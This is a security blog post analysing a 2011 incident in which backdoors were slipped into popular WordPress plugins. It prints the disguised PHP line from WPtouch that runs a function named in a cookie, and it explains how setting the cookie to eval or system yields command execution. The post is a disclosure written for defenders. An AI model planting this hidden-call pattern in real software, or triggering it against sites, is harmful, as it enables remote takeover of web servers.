• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

WordPress plugins hacked – Understanding the backdoor

June 22, 2011David Dede

FacebookTwitterSubscribe

If you haven’t heard about it already, yesterday three popular WordPress plugins (AddThis, WPtouch, and W3 Total Cache) had a malicious backdoor added to them via the plugin repository. That lead to WordPress.org resetting all passwords as a precaution. You can read about it here: Passwords Reset. I must note that the WP.org team did a amazing job dealing with this incident and getting it all fixed very fast!

However, what is interesting to us is what the WordPress.org team said:

Earlier today the WordPress team noticed suspicious commits to several popular plugins (AddThis, WPtouch, and W3 Total Cache) containing cleverly disguised backdoors.

Cleverly disguised backdoors? That’s something we wanted to check. We went to their repositories and found this in the WPtouch changelog:

 if (preg_match("#useragent/([^/]*)/([^/]*)/#i", $_COOKIE[$key], $matches) && $matches[1]($matches[2]))  
                $this->desired_view = $matches[1]&#46$matches[2]; 

What does this code do

Someone skimming through the code may not see anything with malicious intent there. However, it checks if a specific COOKIE is set, and if it is, it parses the content into the $matches variable. After that, it executes the code by calling ($matches[1]($matches[2])) ). That is possible because variable names can be called as functions in PHP (so matches1 is the name, and matches2 the argument of the function).

So someone could set the cookie to eval, or even system/exec, and run any command on the target site as the web server user.

Kudos to the WordPress Core Team

Again, very clever backdoor and I am impressed that the WordPress team caught this in the middle of so many plugins and commits. I wasn’t able to check the other plugins, because it seems that plugins.trac.wordpress.org is down at the moment.

Another thing to highlight, which Matt stated in the news release on WordPress.org, is make sure you update your plugins. By making sure your software is up to date, you have the latest patches and security fixes which in turn lowers your risk of security issues.

If you are worried your site might have been hacked, try scanning it with Sucuri SiteCheck to see if there is anything wrong.

FacebookTwitterSubscribe

Categories: Vulnerability Disclosure, WordPress SecurityTags: Website Backdoor, WordPress Plugins and Themes

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Reader Interactions

Comments

  1. Justin Sternberg

    June 22, 2011

    Found this code in two footer.php files in a multi-site environment: http://d.pr/W60r  Pretty sure it’s because I updated to the bad version of AddThis.  Also had a bunch of new folders/files int the uploads folder. 

    • Justin Sternberg

      June 23, 2011

      so the code found in my footer.php files had nothing to do with these three plugins, but rather with “WP-phpmyadmin WordPress plugin” that you reported on here: https://blog.sucuri.net/2011/06/wp-phpmyadmin-wordpress-plugin-delete-it-now.html

  2. Christopher Ross

    June 23, 2011

    Both the core team and the volunteers at WordPress.org deserve a huge thank you for catching this, it could have been a lot worse.

  3. Webbie

    July 12, 2011

    Kudos to the WordPress.org core team and all the volunteers of WordPress.
    Please keep this up as most of us are not code-savvy.

  4. Nusa Herba

    June 28, 2013

    I’m happy because WordPress constantly updating its technology, especially for security.

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.